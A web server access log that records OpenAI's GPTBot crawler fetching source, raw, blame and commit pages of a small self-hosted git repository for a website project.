"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" +[17/Feb/2026:13:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11648] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 11343] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 13280] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" +[17/Feb/2026:13:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" +[17/Feb/2026:13:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" [Client 74.7.227.38] [Length 10614] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" [Client 74.7.227.38] [Length 10360] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" +[17/Feb/2026:13:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" +[17/Feb/2026:13:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" +[17/Feb/2026:13:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" +[17/Feb/2026:13:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" +[17/Feb/2026:13:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 10978] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" +[17/Feb/2026:13:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" +[17/Feb/2026:13:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" +[17/Feb/2026:13:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" +[17/Feb/2026:13:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" +[17/Feb/2026:13:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" +[17/Feb/2026:13:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10804] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" +[17/Feb/2026:13:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" +[17/Feb/2026:13:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" +[17/Feb/2026:13:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13901] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" +[17/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129.patch" [Client 74.7.227.38] [Length 1870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" +[17/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" +[17/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15338] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15322] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15338] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16461] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15537] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13658] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" +[17/Feb/2026:13:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14185] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14803] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" +[17/Feb/2026:13:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15339] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15339] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" +[17/Feb/2026:13:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" +[17/Feb/2026:13:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16965] [Gzip 8.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" +[17/Feb/2026:13:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15895] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" +[17/Feb/2026:13:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" +[17/Feb/2026:13:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" +[17/Feb/2026:13:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14251] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" +[17/Feb/2026:13:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10465] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 